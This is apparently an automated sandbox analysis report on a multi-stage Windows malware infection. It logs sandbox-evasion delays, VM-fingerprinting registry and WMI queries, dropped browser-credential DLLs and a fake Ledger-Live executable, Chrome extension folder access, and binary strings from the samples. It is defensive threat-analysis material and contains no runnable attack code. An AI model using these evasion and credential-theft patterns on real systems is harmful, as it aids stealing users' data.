Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory allocated: 2C00000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory allocated: 4C00000 memory reserve \| memory write watch

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Code function: 0_2_00007FF64935D123 rdtsc

0_2_00007FF64935D123

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Window / User API: threadDelayed 980	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Window / User API: threadDelayed 971
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 4656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 515
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 432
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 695
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 500
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 631
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 592

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-Q84B1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\libgcc_s_dw2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\libbz2-1.dll (copy)	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sqlm[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Ledger-Live[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Software[1].exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FHCGHJDBFI.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\AFCBAEBAEB.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-2KU66.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS94A6.tmp\Install.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSB2BD.tmp\Install.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\DBKKFCBAKK.exe	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-78F35.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\libvorbis-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-KPHSL.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-MJB4L.tmp	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\htmlprofessionalkit.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\libogg-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-SG0PM.tmp	Jump to dropped file
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-EPH22.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-K8PDA.tmp\Y8KGRj_sUjw5KjZpIoRDoSwV.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\HTML Professional Kit\is-N48NI.tmp	Jump to dropped file

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe

Evasive API call chain: GetSystemTime,DecisionNodes

graph_11-6440

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	API coverage: 8.2 %
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API coverage: 6.0 %

Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 3168	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 6852	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 7272	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 7272	Thread sleep time: -84200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 6852	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe TID: 7304	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe TID: 7612	Thread sleep count: 980 > 30	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe TID: 7612	Thread sleep time: -98980s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe TID: 7644	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe TID: 7896	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe TID: 7692	Thread sleep count: 194 > 30
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe TID: 7724	Thread sleep count: 971 > 30
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe TID: 7724	Thread sleep time: -98071s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3468	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7452	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6164	Thread sleep count: 515 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6164	Thread sleep time: -3605000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1712	Thread sleep time: -69500s >= -30000s
Source: C:\Windows\explorer.exe TID: 6796	Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe TID: 6180	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe TID: 7920	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_00412570
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	12_2_0040D1C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_004015C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	12_2_00411650
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	12_2_0040B610
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	12_2_0040DB60
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	12_2_00411B80
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	12_2_0040D540
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	12_2_004121F0

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Code function: 5_2_003DE084 GetSystemInfo,

5_2_003DE084

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: psapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= p
